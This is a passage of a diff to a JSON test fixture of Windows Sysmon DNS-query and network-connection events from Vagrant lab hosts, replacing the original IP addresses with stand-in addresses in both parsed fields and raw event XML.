Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029851300Z'/\u003e\u003cEventRecordID\u003e127\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.889\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimages.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -3463,7 +3463,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e15\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003ea00:20f:0:0:18a2:6e00:e0:ffff\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55542\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003ee000:fc:4300:6800:7200:6f00:6d00:6500\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e15\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55542\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "3", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -3485,12 +3485,12 @@ "UtcTime": "2019-03-18 16:57:48.250", "User": "NT AUTHORITY\\NETWORK SERVICE", "Image": "C:\\Windows\\System32\\svchost.exe", - "SourceIp": "a00:20f:0:0:18a2:6e00:e0:ffff", + "SourceIp": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "DestinationPort": "5355", "DestinationPortName": "llmnr", "ProcessGuid": "{42f11c3b-0bad-5c8c-0000-0010dfbc0000}", "ProcessId": "924", - "DestinationIp": "e000:fc:4300:6800:7200:6f00:6d00:6500", + "DestinationIp": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "SourceIsIpv6": "true", "SourcePort": "55542", "Initiated": "true", @@ -3512,7 +3512,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e16\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e169.254.180.25\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e169.254.255.255\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e16\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "3", "kind": "event" @@ -3541,10 +3541,10 @@ "SourceIsIpv6": "false", "DestinationIsIpv6": "false", "ProcessId": "4", - "DestinationIp": "169.254.255.255", + "DestinationIp": "89.160.20.156", "ProcessGuid": "{42f11c3b-6e19-5c8c-0000-0010eb030000}", "Initiated": "true", - "SourceIp": "169.254.180.25", + "SourceIp": "89.160.20.156", "SourcePort": "137", "SourcePortName": "netbios-ns", "DestinationPort": "137" @@ -3564,7 +3564,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e17\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e169.254.255.255\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e169.254.180.25\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e17\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "3" }, "winlog": { @@ -3586,8 +3586,8 @@ "ProcessId": "4", "Initiated": "false", "User": "NT AUTHORITY\\SYSTEM", - "SourceIp": "169.254.255.255", - "DestinationIp": "169.254.180.25", + "SourceIp": "89.160.20.156", + "DestinationIp": "89.160.20.156", "DestinationPort": "137", "Image": "System", "Protocol": "udp", @@ -3680,10 +3680,10 @@ "User": "NT AUTHORITY\\NETWORK SERVICE", "Initiated": "true", "DestinationIsIpv6": "true", - "DestinationIp": "e000:fc:0:0:0:0:0:0", + "DestinationIp": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "DestinationPortName": "llmnr", "ProcessGuid": "{42f11c3b-0bad-5c8c-0000-0010dfbc0000}", - "SourceIp": "a9fe:b419:0:0:f880:2301:e0:ffff", + "SourceIp": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "UtcTime": "2019-03-18 16:57:48.251", "ProcessId": "924", "Image": "C:\\Windows\\System32\\svchost.exe", @@ -3698,7 +3698,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e19\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003ea9fe:b419:0:0:f880:2301:e0:ffff\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55717\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003ee000:fc:0:0:0:0:0:0\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e19\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55717\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "3", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -3710,7 +3710,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e20\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.264\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e40.77.226.250\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e20\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.264\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "3", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -3742,7 +3742,7 @@ "Initiated": "true", "SourceIp": "10.0.2.15", "UtcTime": "2019-03-18 16:57:48.264", - "DestinationIp": "40.77.226.250", + "DestinationIp": "89.160.20.156", "DestinationIsIpv6": "false", "ProcessId": "4", "Protocol": "udp", @@ -3818,7 +3818,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:50.357238700Z'/\u003e\u003cEventRecordID\u003e22\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:49.213\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData 